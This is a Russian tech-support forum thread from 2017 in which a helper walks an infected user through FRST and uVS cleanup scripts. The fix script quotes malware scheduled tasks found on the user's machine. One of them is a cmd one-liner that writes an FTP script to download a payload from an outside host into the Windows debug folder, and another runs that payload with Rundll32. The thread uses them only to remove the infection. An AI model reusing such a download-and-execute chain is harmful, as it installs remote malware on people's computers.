Алексей Корякин 0 Опубликовано 7 июля, 2017 Автор Share Опубликовано 7 июля, 2017 пофиксил...сейчас прикреплю результаты от FRST готово...... убегаю по делам до завтра спасибо. p.s: я вспомнил после чего все у меня началось,после того как я скачал с торрента программу ВидеоМастер, если это как то поможет расследованию буду рад. FRST.txt Addition.txt Shortcut.txt Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 7 июля, 2017 Share Опубликовано 7 июля, 2017 1) Driver Booster 4.4 (HKLM\...\Driver Booster_is1) (Version: 4.4.0 - IObit) DriverPack Notifier (HKLM\...\DriverPack Notifier) (Version: 17.7.52+security.1 - DriverPack Solution) потенциально нежелательно ПО, деинсталируйте эти программы. 2) На всякий случай создайте точку восстановления системы. 3) Отключите до перезагрузки антивирус. Выделите следующий код:Start:: CreateRestorePoint: Toolbar: HKU\S-1-5-21-3771618468-3873209950-3876607537-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} - No File FF Plugin: @microsoft.com/GENUINE -> disabled [No File] 2017-07-07 19:38 - 2017-07-07 19:38 - 00000000 ____D C:\ProgramData\ProductData CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{7C6E29BC-8B8B-4C3D-859E-AF6CD158BE0F}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C0-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C1-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C2-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C3-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C4-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C5-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C6-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C8-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969C9-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969CA-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File CustomCLSID: HKU\S-1-5-21-3771618468-3873209950-3876607537-1001_Classes\CLSID\{88D969D6-F192-11D4-A65F-0040963251E5}\InprocServer32 -> C:\Windows\system32\msxml4.dll => No File ContextMenuHandlers01: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => -> No File ContextMenuHandlers01: [BB FlashBack 2] -> {A8065B9E-193F-4797-B62D-8F6321E7FCCB} => -> No File ContextMenuHandlers04: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => -> No File Task: {52553716-593C-415E-8E74-35427B267603} - System32\Tasks\curls => C:\Users\Леша\AppData\Roaming\curl\curl.exe Task: {54DF886B-16F5-4EFB-97F4-4C60D284D748} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION Task: {564FC5D7-AD53-4BF1-A322-63F381751518} - System32\Tasks\curl => C:\Users\Леша\AppData\Roaming\curl\curl_7_54.exe Task: {8BD17DF5-1D79-4B9A-9407-BEE9E405B6BB} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {B3B163AE-1AF2-491A-A923-921031FBA4DD} - System32\Tasks\Mysa1 => Rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {F8DB75D0-3012-41DF-878C-4FC6550A0805} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION Task: {FF375C70-CAA0-4C26-B1CE-E6F3756AD1EF} - System32\Tasks\MSI => C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION FirewallRules: [{3CBC202D-B0FA-4201-B4E8-218C2752CEC7}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DriverBooster.exe FirewallRules: [{CA28376A-ADFF-49DC-9138-24910DFEE3DB}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DriverBooster.exe FirewallRules: [{0D5C741E-87C9-481F-BE3E-3516B43A57AB}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DBDownloader.exe FirewallRules: [{FE37023A-5C0B-4E27-A62E-763BAA8B2808}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\DBDownloader.exe FirewallRules: [{DCC0E687-38F4-4CA9-9328-A09224443250}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\AutoUpdate.exe FirewallRules: [{4708C2D9-1E95-4B94-BFDA-D3F119B3AF8F}] => (Allow) C:\Program Files\IObit\Driver Booster\4.4.0\AutoUpdate.exe EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Цитата Ссылка на сообщение Поделиться на другие сайты
Алексей Корякин 0 Опубликовано 8 июля, 2017 Автор Share Опубликовано 8 июля, 2017 (изменено) добрый день Regist, готово еще хотел прикрепит скрин в каком виде у меня касперский выдает оповещение, что заблокирован опасный веб адрес, там фигурирует какая-то программа Chromium + название сайта. ( выделил стрелками на скрине ) вдруг это как то поможет. Fixlog.txt Изменено 8 июля, 2017 пользователем Алексей Корякин Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 8 июля, 2017 Share Опубликовано 8 июля, 2017 там фигурирует какая-то программа Chromium А она вам не знакома? Вы какими браузерами пользуетесь? Сделайте полный образ автозапуска uVS, только программу скачайте отсюда. Цитата Ссылка на сообщение Поделиться на другие сайты
Алексей Корякин 0 Опубликовано 10 июля, 2017 Автор Share Опубликовано 10 июля, 2017 там фигурирует какая-то программа Chromium А она вам не знакома? Вы какими браузерами пользуетесь? Сделайте полный образ автозапуска uVS, только программу скачайте отсюда. добрый вечер! извиняюсь что был оффлайн...дела. на счет chromium -конечно не знакома. мой основной браузер - google chrome. сейчас постараюсь сделать то что вы попросили... отпишусь... готово..... да... ее видно в списке там..... ЛЕША-ПК_2017-07-10_23-52-21.7z Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 11 июля, 2017 Share Опубликовано 11 июля, 2017 Вы какими браузерами пользуетесь? не ответили.И вижу вы пользуетесь репаками от Кролика, а репаки этого автора в свою очередь как раз являются источников заражения. Также как и репаки от Дьяка. Выполните скрипт в uVS ;uVS v4.0.6 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG deldir %SystemDrive%\USERS\ЛЕША\APPDATA\LOCAL\YC\ ;---------command-block--------- delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.153\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.165\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.23.9\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.15\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\IOBIT\DRIVER BOOSTER\4.4.0\DRIVERBOOSTER.EXE apply restart Цитата Ссылка на сообщение Поделиться на другие сайты
Алексей Корякин 0 Опубликовано 11 июля, 2017 Автор Share Опубликовано 11 июля, 2017 выполнил скрипт ...(но папка ZOO_ не появилась) Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 11 июля, 2017 Share Опубликовано 11 июля, 2017 выполнил скрипт ...(но папка ZOO_ не появилась) И не должна. @Алексей Корякин, почему уже 3-й раз вы игнорируете мой вопрос? Цитата Ссылка на сообщение Поделиться на другие сайты
Алексей Корякин 0 Опубликовано 11 июля, 2017 Автор Share Опубликовано 11 июля, 2017 выполнил скрипт ...(но папка ZOO_ не появилась)И не должна. @Алексей Корякин, почему уже 3-й раз вы игнорируете мой вопрос? я же писал что в основном хромом... иногда опера турбо. Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 11 июля, 2017 Share Опубликовано 11 июля, 2017 Вопрос был не какой основной, а какими (все) пользуетесь. Вот видите ещё и Опера всплыла... что с проблемой? Цитата Ссылка на сообщение Поделиться на другие сайты
Алексей Корякин 0 Опубликовано 11 июля, 2017 Автор Share Опубликовано 11 июля, 2017 только что снова вышло оповещение от касперского что заблокирован опасный веб адресс... безнадега какая-то Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 11 июля, 2017 Share Опубликовано 11 июля, 2017 скрин оповещения покажите. И свежий лог uVS. Цитата Ссылка на сообщение Поделиться на другие сайты
Алексей Корякин 0 Опубликовано 11 июля, 2017 Автор Share Опубликовано 11 июля, 2017 скрин оповещения покажите. И свежий лог uVS. ЛЕША-ПК_2017-07-11_14-20-42.7z Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 11 июля, 2017 Share Опубликовано 11 июля, 2017 Перед выполнением предыдущего скрипта uVS вы антивирус отключали? Выполните его ещё раз. После выполнения в папке с uVS будет текстовый файл с датой в название, прикреприте его. Цитата Ссылка на сообщение Поделиться на другие сайты
Алексей Корякин 0 Опубликовано 12 июля, 2017 Автор Share Опубликовано 12 июля, 2017 Перед выполнением предыдущего скрипта uVS вы антивирус отключали? Выполните его ещё раз. После выполнения в папке с uVS будет текстовый файл с датой в название, прикреприте его. точно не помню уже.... доброе утро. сейчас сделаю снова вот 2017-07-12_07-06-47_log.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.